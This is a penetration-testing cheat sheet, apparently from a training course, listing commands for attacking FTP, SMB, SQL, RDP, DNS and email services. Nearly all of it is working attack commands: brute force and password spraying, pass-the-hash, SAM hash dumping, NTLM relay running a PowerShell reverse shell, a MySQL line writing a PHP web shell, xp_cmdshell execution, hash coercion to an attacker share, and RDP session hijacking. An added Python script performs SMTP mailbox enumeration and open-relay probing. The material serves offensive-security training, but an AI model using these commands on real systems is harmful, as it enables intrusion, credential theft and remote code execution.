# Attacking Common Services

## Attacking FTP

| **Command**                                                              | **Description**                                      |
| ------------------------------------------------------------------------ | ---------------------------------------------------- |
| `ftp 192.168.2.142`                                                      | Connecting to the FTP server using the `ftp` client. |
| `nc -v 192.168.2.142 21`                                                 | Connecting to the FTP server using `netcat`.         |
| `hydra -l user1 -P /usr/share/wordlists/rockyou.txt ftp://192.168.2.142` | Brute-forcing the FTP service.                       |

***

## Attacking SMB

| **Command**                                                                                                     | **Description**                                                       |
| --------------------------------------------------------------------------------------------------------------- | --------------------------------------------------------------------- |
| `smbclient -N -L //10.129.14.128`                                                                               | Null-session testing against the SMB service.                         |
| `smbmap -H 10.129.14.128`                                                                                       | Network share enumeration using `smbmap`.                             |
| `smbmap -H 10.129.14.128 -r notes`                                                                              | Recursive network share enumeration using `smbmap`.                   |
| `smbmap -H 10.129.14.128 --download "notes\note.txt"`                                                           | Download a specific file from the shared folder.                      |
| `smbmap -H 10.129.14.128 --upload test.txt "notes\test.txt"`                                                    | Upload a specific file to the shared folder.                          |
| `rpcclient -U'%' 10.10.110.17`                                                                                  | Null-session with the `rpcclient`.                                    |
| `./enum4linux-ng.py 10.10.11.45 -A -C`                                                                          | Automated enumeration of the SMB service using `enum4linux-ng`.       |
| `crackmapexec smb 10.10.110.17 -u /tmp/userlist.txt -p 'Company01!'`                                            | Password spraying against different users from a list.                |
| `impacket-psexec administrator:'Password123!'@10.10.110.17`                                                     | Get a SYSTEM shell on the host over SMB using `impacket-psexec` (requires local administrator credentials). |
| `crackmapexec smb 10.10.110.17 -u Administrator -p 'Password123!' -x 'whoami' --exec-method smbexec`            | Execute a command over the SMB service using `crackmapexec`.          |
| `crackmapexec smb 10.10.110.0/24 -u administrator -p 'Password123!' --loggedon-users`                           | Enumerating Logged-on users.                                          |
| `crackmapexec smb 10.10.110.17 -u administrator -p 'Password123!' --sam`                                        | Extract hashes from the SAM database.                                 |
| `crackmapexec smb 10.10.110.17 -u Administrator -H 2B576ACBE6BCFDA7294D6BD18041B8FE`                            | Use the Pass-The-Hash technique to authenticate on the target host.   |
| `impacket-ntlmrelayx --no-http-server -smb2support -t 10.10.110.146`                                            | Relay captured NTLM authentication to the target and dump its SAM database (the default `impacket-ntlmrelayx` action). |
| `impacket-ntlmrelayx --no-http-server -smb2support -t 192.168.220.146 -c 'powershell -e <base64 reverse shell>'` | Execute a PowerShell based reverse shell on the relay target using `impacket-ntlmrelayx`. |

***

## Attacking SQL Databases

| **Command**                                                                                                                | **Description**                                                                                               |
| -------------------------------------------------------------------------------------------------------------------------- | ------------------------------------------------------------------------------------------------------------- |
| `mysql -u julio -pPassword123 -h 10.129.20.13`                                                                             | Connecting to the MySQL server.                                                                               |
| `sqlcmd -S SRVMSSQL\SQLEXPRESS -U julio -P 'MyPassword!' -y 30 -Y 30`                                                      | Connecting to the MSSQL server.                                                                               |
| `sqsh -S 10.129.203.7 -U julio -P 'MyPassword!' -h`                                                                        | Connecting to the MSSQL server from Linux.                                                                    |
| `sqsh -S 10.129.203.7 -U .\\julio -P 'MyPassword!' -h`                                                                     | Connecting to the MSSQL server from Linux while Windows Authentication mechanism is used by the MSSQL server. |
| `mysql> SHOW DATABASES;`                                                                                                   | Show all available databases in MySQL.                                                                        |
| `mysql> USE htbusers;`                                                                                                     | Select a specific database in MySQL.                                                                          |
| `mysql> SHOW TABLES;`                                                                                                      | Show all available tables in the selected database in MySQL.                                                  |
| `mysql> SELECT * FROM users;`                                                                                              | Select all available entries from the "users" table in MySQL.                                                 |
| `sqlcmd> SELECT name FROM master.dbo.sysdatabases`                                                                         | Show all available databases in MSSQL.                                                                        |
| `sqlcmd> USE htbusers`                                                                                                     | Select a specific database in MSSQL.                                                                          |
| `sqlcmd> SELECT * FROM htbusers.INFORMATION_SCHEMA.TABLES`                                                                 | Show all available tables in the selected database in MSSQL.                                                  |
| `sqlcmd> SELECT * FROM users`                                                                                              | Select all available entries from the "users" table in MSSQL.                                                 |
| `sqlcmd> EXECUTE sp_configure 'show advanced options', 1`                                                                  | To allow advanced options to be changed.                                                                      |
| `sqlcmd> EXECUTE sp_configure 'xp_cmdshell', 1`                                                                            | To enable the xp\_cmdshell.                                                                                   |
| `sqlcmd> RECONFIGURE`                                                                                                      | To be used after each sp\_configure command to apply the changes.                                             |
| `sqlcmd> xp_cmdshell 'whoami'`                                                                                             | Execute a system command from MSSQL server.                                                                   |
| `mysql> SELECT "<?php echo shell_exec($_GET['c']);?>" INTO OUTFILE '/var/www/html/webshell.php'`                           | Write a PHP web shell into the web root using MySQL's `INTO OUTFILE` (requires the `FILE` privilege and a permissive `secure_file_priv`). |
| `mysql> show variables like "secure_file_priv";`                                                                           | Check `secure_file_priv`: an empty value means MySQL can read and write files anywhere on the filesystem; `NULL` disables file operations entirely. |
| `sqlcmd> SELECT * FROM OPENROWSET(BULK N'C:/Windows/System32/drivers/etc/hosts', SINGLE_CLOB) AS Contents`                 | Read local files in MSSQL.                                                                                    |
| `mysql> select LOAD_FILE("/etc/passwd");`                                                                                  | Read local files in MySQL.                                                                                    |
| `sqlcmd> EXEC master..xp_dirtree '\\10.10.110.17\share\'`                                                                  | Coerce the MSSQL service account to authenticate to an attacker-controlled SMB share with `xp_dirtree`, capturing its NetNTLM hash. |
| `sqlcmd> EXEC master..xp_subdirs '\\10.10.110.17\share\'`                                                                  | Same hash capture using the `xp_subdirs` command in MSSQL.            |
| `sqlcmd> SELECT srvname, isremote FROM sysservers`                                                                         | Identify linked servers in MSSQL.                                                                             |
| `sqlcmd> EXECUTE('select @@servername, @@version, system_user, is_srvrolemember(''sysadmin'')') AT [10.0.0.12\SQLEXPRESS]` | Identify the user and its privileges used for the remote connection in MSSQL.                                 |

***

## Attacking RDP

| **Command**                                                                                          | **Description**                                                                 |
| ---------------------------------------------------------------------------------------------------- | ------------------------------------------------------------------------------- |
| `crowbar -b rdp -s 192.168.220.142/32 -U users.txt -c 'password123'`                                 | Password spraying against the RDP service.                                      |
| `hydra -L usernames.txt -p 'password123' 192.168.2.143 rdp`                                          | Password spraying a single password across a user list against the RDP service with `hydra`. |
| `rdesktop -u admin -p password123 192.168.2.143`                                                     | Connect to the RDP service using `rdesktop` in Linux.                           |
| `tscon #{TARGET_SESSION_ID} /dest:#{OUR_SESSION_NAME}`                                               | Attach another user's RDP session to our own without their password (must run as SYSTEM). |
| `net start sessionhijack`                                                                            | Start the service created beforehand with `sc.exe` whose binary path runs the `tscon` command as SYSTEM, performing the session hijack. |
| `reg add HKLM\System\CurrentControlSet\Control\Lsa /t REG_DWORD /v DisableRestrictedAdmin /d 0x0 /f` | Enable "Restricted Admin Mode" on the target Windows host (requires local administrator rights; this is what makes RDP Pass-The-Hash possible). |
| `xfreerdp /v:192.168.2.141 /u:admin /pth:A9FDFA038C4B75EBC76DC855DD74F0DA`                           | Use the Pass-The-Hash technique to login on the target host without a password. |

***

## Attacking DNS

| **Command**                                         | **Description**                                                       |
| --------------------------------------------------- | --------------------------------------------------------------------- |
| `dig AXFR @ns1.inlanefreight.htb inlanefreight.htb` | Perform an AXFR zone transfer attempt against a specific name server. |
| `subfinder -d inlanefreight.com -v`                 | Passive subdomain enumeration with `subfinder` (public data sources, not brute force). |
| `host support.inlanefreight.com`                    | DNS lookup for the specified subdomain.                               |

***

## Attacking Email Services

| **Command**                                                                                                                                             | **Description**                                                                        |
| ------------------------------------------------------------------------------------------------------------------------------------------------------- | -------------------------------------------------------------------------------------- |
| `host -t MX microsoft.com`                                                                                                                              | DNS lookup for mail servers for the specified domain.                                  |
| `dig mx inlanefreight.com \| grep "MX" \| grep -v ";"`                                                                                                  | DNS lookup for mail servers for the specified domain.                                  |
| `host -t A mail1.inlanefreight.htb.`                                                                                                                    | DNS lookup of the IPv4 address for the specified subdomain.                            |
| `telnet 10.10.110.20 25`                                                                                                                                | Connect to the SMTP server.                                                            |
| `smtp-user-enum -M RCPT -U userlist.txt -D inlanefreight.htb -t 10.129.203.7`                                                                           | SMTP user enumeration using the RCPT command against the specified host.               |
| `python3 o365spray.py --validate --domain msplaintext.xyz`                                                                                              | Verify the usage of Office365 for the specified domain.                                |
| `python3 o365spray.py --enum -U users.txt --domain msplaintext.xyz`                                                                                     | Enumerate existing users using Office365 on the specified domain.                      |
| `python3 o365spray.py --spray -U usersfound.txt -p 'March2022!' --count 1 --lockout 1 --domain msplaintext.xyz`                                         | Password spraying against a list of users that use Office365 for the specified domain. |
| `hydra -L users.txt -p 'Company01!' -f 10.10.110.20 pop3`                                                                                               | Brute-forcing the POP3 service.                                                        |
| `swaks --from notifications@inlanefreight.com --to employees@inlanefreight.com --header 'Subject: Notification' --body 'Message' --server 10.10.11.213` | Testing the SMTP service for the open-relay vulnerability.                             |

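The `smtp-user-enum -M RCPT` and `swaks` rows above both exercise the SMTP envelope commands: a `250` to `RCPT TO` for a local address reveals that the mailbox exists, and a `250` for an address in a foreign domain reveals an open relay. The following example is added here and is not part of the original cheat sheet or of those tools: it performs both checks with Python's `smtplib` against a constructed in-process mock SMTP server on 127.0.0.1 so the exchange runs offline. The mock knows three assumed mailboxes in `inlanefreight.htb`, answers `550` for unknown local users and `554` for other domains (or `250` when started with `open_relay=True`); the domain, host names and mailbox names are assumptions, and against a real target you would pass its address and port instead.

```python
"""SMTP user enumeration via RCPT TO and an open-relay probe.

Added example, not code from the original cheat sheet or from smtp-user-enum/swaks.
The target is a constructed in-process mock SMTP server on 127.0.0.1 so the
dialogue runs offline; TARGET_DOMAIN, MOCK_MAILBOXES and the host names are assumed.
"""
import smtplib
import socket
import threading

TARGET_DOMAIN = "inlanefreight.htb"           # assumed target mail domain
MOCK_MAILBOXES = {"jorge", "pedro", "kate"}   # constructed: mailboxes the mock server knows


def start_mock_smtp(open_relay: bool = False) -> int:
    """Serve a minimal SMTP dialogue on an ephemeral localhost port; return the port.

    RCPT TO gets 250 for a known local mailbox, 550 for an unknown local user and
    554 for any other domain (250 instead when open_relay=True).
    """
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))
    srv.listen(5)
    port = srv.getsockname()[1]

    def handle(conn: socket.socket) -> None:
        # Text-mode socket file; newline="\r\n" gives SMTP CRLF framing automatically.
        with conn, conn.makefile("rw", encoding="ascii", newline="\r\n") as f:
            f.write("220 mail1.inlanefreight.htb ESMTP\n")
            f.flush()
            for raw in f:
                verb, _, arg = raw.strip().partition(" ")
                verb = verb.upper()                         # smtplib sends lowercase verbs
                if verb in ("HELO", "EHLO", "MAIL", "RSET", "NOOP"):
                    reply = "250 OK"
                elif verb == "RCPT":
                    addr = arg.partition(":")[2].strip("<> ").lower()   # arg is TO:<user@domain>
                    user, _, domain = addr.partition("@")
                    if domain != TARGET_DOMAIN:
                        reply = "250 OK" if open_relay else "554 5.7.1 Relay access denied"
                    elif user in MOCK_MAILBOXES:
                        reply = "250 2.1.5 OK"
                    else:
                        reply = "550 5.1.1 User unknown"
                elif verb == "QUIT":
                    f.write("221 Bye\n")
                    f.flush()
                    break
                else:
                    reply = "500 Command not recognized"
                f.write(reply + "\n")
                f.flush()

    def serve() -> None:
        while True:
            conn, _ = srv.accept()
            try:
                handle(conn)
            except OSError:
                pass                                        # client dropped the connection; keep serving

    threading.Thread(target=serve, daemon=True).start()
    return port


def enumerate_mailboxes(host: str, port: int, domain: str, candidates: list) -> list:
    """RCPT-based enumeration (what smtp-user-enum -M RCPT does): 250 means the mailbox exists."""
    valid = []
    with smtplib.SMTP(host, port, local_hostname="probe.local", timeout=5) as smtp:
        smtp.helo()
        for user in candidates:
            smtp.mail("probe@probe.local")                  # an envelope sender must precede RCPT
            code, _ = smtp.rcpt(f"{user}@{domain}")
            if code == 250:
                valid.append(user)
            smtp.rset()                                     # clear the envelope before the next probe
    return valid


def is_open_relay(host: str, port: int) -> bool:
    """swaks-style check: does the server accept a recipient outside its own domain?"""
    with smtplib.SMTP(host, port, local_hostname="probe.local", timeout=5) as smtp:
        smtp.helo()
        smtp.mail("notifications@inlanefreight.com")
        code, _ = smtp.rcpt("someone@external.example")     # constructed foreign recipient
        return code == 250


if __name__ == "__main__":
    port = start_mock_smtp()
    print("valid mailboxes:", enumerate_mailboxes("127.0.0.1", port, TARGET_DOMAIN,
                                                  ["admin", "jorge", "kate", "bob"]))
    print("open relay:", is_open_relay("127.0.0.1", port))
    print("open relay (misconfigured mock):", is_open_relay("127.0.0.1", start_mock_smtp(open_relay=True)))
```

Real servers may answer `252` ("cannot verify, will accept") or `250` for every recipient to defeat exactly this enumeration, so treat a uniform response across a candidate list as a sign that RCPT-based enumeration is not reliable against that host.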